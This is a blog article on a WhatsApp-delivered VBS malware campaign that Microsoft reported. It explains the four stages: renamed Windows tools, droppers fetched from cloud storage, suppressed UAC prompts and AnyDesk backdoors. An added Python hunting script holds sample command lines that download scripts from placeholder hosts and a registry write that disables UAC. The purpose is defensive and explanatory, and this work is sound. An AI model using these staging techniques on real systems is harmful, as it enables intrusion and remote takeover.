
WhatsApp malware: Microsoft warns of dangerous backdoor campaign

A new WhatsApp malware campaign is keeping Windows users on their toes: Microsoft has discovered a multi-stage attack chain in which cybercriminals send malicious scripts via the popular messenger – and ultimately gain remote access to the infected systems. Anyone using WhatsApp on the Windows desktop should now take a close look.

Attack via WhatsApp desktop: This is how the infection works

At the end of February 2026, the Microsoft Defender Security Research Team observed a campaign that delivers malicious VBS (Visual Basic Script) files to victims via WhatsApp messages. The attack is particularly insidious: it abuses the trust that users place in the well-known communication platform. Opening the file triggers a multi-stage infection chain.

Users of the WhatsApp desktop version under Windows are particularly at risk, as VBS files can be executed directly there without any detours – unlike on smartphones.

The four stages of the attack

Stage 1: Initial access via WhatsApp

As soon as the VBS script is executed, it creates hidden folders under C:\ProgramData. Renamed copies of legitimate Windows tools are stored there – for example curl.exe as netapi.dll or bitsadmin.exe as sc.exe. The renaming is intended to trick security solutions. However, the PE metadata of the files (such as the OriginalFileName field) is retained, which gives security products a reliable detection handle.

Stage 2: Reloading further malware from the cloud

In the next step, the malware uses the renamed binary files to download additional droppers – such as auxs.vbs or WinUpdate_KB5034231.vbs. These are downloaded from well-known cloud services such as AWS S3, Tencent Cloud and Backblaze B2. The attackers deliberately use trustworthy cloud infrastructures so that the malicious data traffic looks like normal network traffic and is not blocked by protection programs.

Stage 3: Privilege escalation and persistence

The downloaded scripts tamper with Windows settings: the malware manipulates User Account Control (UAC) by modifying the registry value ConsentPromptBehaviorAdmin, so that UAC prompts are silently suppressed. In addition, it repeatedly launches cmd.exe with elevated rights and anchors itself via changes in the registry under HKLM\Software\Microsoft\Win, so that the infection survives a restart.

Stage 4: Installation of backdoors via MSI packages

In the last stage, unsigned MSI installers are downloaded – with file names such as Setup.msi, WinRAR.msi, LinkPoint.msi and AnyDesk.msi. These contain remote control software such as AnyDesk and give the attackers permanent remote access. They can use this to steal data, install further malware or misuse the compromised system as part of a botnet. In corporate environments, MSI installations typically go unnoticed, which further improves stealth.

Who is behind it and who is affected?

Microsoft does not provide any specific details about the attackers or targeted victim groups. However, the analysis describes that the campaign relies on social engineering and so-called “living-off-the-land” techniques (LOLBins) – i.e. attacks that rely exclusively on legitimate tools already present in Windows in order to bypass security solutions.

Basically, all Windows users with the WhatsApp desktop app installed should consider themselves potential targets. Particular caution is warranted with messages from unknown senders that contain file attachments.

How to protect yourself – recommendations from Microsoft

Microsoft recommends the following protective measures, among others:

  • Restrict script execution: Block execution of script hosts such as wscript.exe, cscript.exe and mshta.exe from untrusted paths.
  • Monitor cloud traffic: Check traffic to services such as AWS S3, Tencent Cloud and Backblaze B2 for unusual downloads.
  • Keep an eye on UAC changes: Treat registry changes under HKLM\Software\Microsoft\Win and manipulations of the UAC settings as a warning signal.
  • Keep Microsoft Defender up to date: According to Microsoft, Defender’s cloud-based protection detects the relevant malware (including as Trojan:VBS/Obfuse.KPP!MTB and Trojan:VBS/BypassUAC.PAA!MTB).
  • Sensitize users: Employees should be made aware of suspicious attachments in messengers – attackers can also strike via WhatsApp.

Anyone using Microsoft Defender for Endpoint can also activate Attack Surface Reduction (ASR) rules to block the execution of VBScript and obfuscated scripts.
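The three detection angles the article names (Stage 1's renamed LOLBins whose PE OriginalFileName survives, Stage 3's ConsentPromptBehaviorAdmin change, and the recommendation to keep script hosts away from untrusted paths) as a small hunting script over constructed Sysmon-style events. This is an added example, not Microsoft's code; the folder names, URLs and event layout are constructed, and the ConsentPromptBehaviorAdmin location under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System is assumed here rather than taken from the article.

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample telemetry (not real logs) in a simplified key="value" form modelled on
# Sysmon process-creation (ID 1) and registry value-set (ID 13) fields; paths and URLs are placeholders.
SAMPLE_EVENTS = [
    'EventID="1" Image="C:\\ProgramData\\Svc\\netapi.dll" OriginalFileName="curl.exe" '
    'CommandLine="netapi.dll -s -o auxs.vbs https://bucket.example/auxs.vbs"',
    'EventID="1" Image="C:\\ProgramData\\Svc\\sc.exe" OriginalFileName="bitsadmin.exe" '
    'CommandLine="sc.exe /transfer j https://bucket.example/WinUpdate_KB5034231.vbs C:\\ProgramData\\Svc\\u.vbs"',
    'EventID="1" Image="C:\\Windows\\System32\\wscript.exe" OriginalFileName="wscript.exe" '
    'CommandLine="wscript.exe C:\\ProgramData\\Svc\\auxs.vbs"',
    'EventID="13" TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" '
    'Details="DWORD (0x00000000)"',
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
UAC_VALUE_SUFFIX = "\\policies\\system\\consentpromptbehavioradmin"
SCRIPT_PATH = re.compile(r'[a-z]:\\[^\s"]+\.(?:vbs|vbe|js|jse|wsf|hta)', re.I)

def parse_event(line: str) -> Dict[str, str]:
    return dict(re.findall(r'(\w+)="([^"]*)"', line))

def check_masquerade(ev: Dict[str, str]) -> Optional[str]:
    """Stage 1: the name on disk differs from the PE's retained OriginalFileName."""
    name = ntpath.basename(ev.get("Image", "")).lower()
    orig = ev.get("OriginalFileName", "").lower()
    return f"renamed LOLBin: {name} has OriginalFileName {orig}" if orig and name != orig else None

def check_script_host(ev: Dict[str, str]) -> Optional[str]:
    """Recommendation: a script host executing a script from outside trusted roots."""
    if ev.get("OriginalFileName", "").lower() not in SCRIPT_HOSTS:
        return None
    for path in SCRIPT_PATH.findall(ev.get("CommandLine", "")):
        if not path.lower().startswith(TRUSTED_ROOTS):
            return f"script host ran {path} from an untrusted path"
    return None

def check_uac(ev: Dict[str, str]) -> Optional[str]:
    """Stage 3: ConsentPromptBehaviorAdmin written as 0, i.e. elevate without prompting."""
    if ev.get("EventID") != "13" or not ev.get("TargetObject", "").lower().endswith(UAC_VALUE_SUFFIX):
        return None
    m = re.search(r"0x([0-9a-f]+)", ev.get("Details", ""), re.I)
    return "ConsentPromptBehaviorAdmin set to 0 (UAC prompts suppressed)" if m and int(m.group(1), 16) == 0 else None

def hunt(lines: List[str]) -> List[Tuple[str, str]]:
    """Run every rule over every parsed event; return (rule name, detail) pairs."""
    rules = (check_masquerade, check_script_host, check_uac)
    return [(r.__name__, hit) for ev in map(parse_event, lines) for r in rules if (hit := r(ev))]
```

On a real host the same comparison can be made against the VersionInfo of files under C:\ProgramData and the live registry value, which is the check the article's Stage 1 and Stage 3 descriptions point at.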

Not an isolated case: Messenger increasingly targeted

The campaign is part of a series of attacks that specifically use popular messenger platforms as an entry point. At the end of 2024, CISA warned of sophisticated social engineering attacks on messenger users. Anyone who frequently receives messages from strangers – such as people in high-profile positions or in companies – should be particularly vigilant.


Conclusion: Take WhatsApp malware seriously

The newly discovered WhatsApp malware campaign shows just how sophisticated modern attacks have become. Anyone working with WhatsApp Desktop on Windows should always ignore VBS file attachments – regardless of who they supposedly come from. Microsoft Defender and regular updates help to ward off such attacks. Microsoft has published the full technical analysis and Indicators of Compromise (IOCs) on its security blog.

Simon Lüthje

I am co-founder of this blog and am very interested in everything that has to do with technology, but I also like to play games. I was born in Hamburg, but now I live in Bad Segeberg.
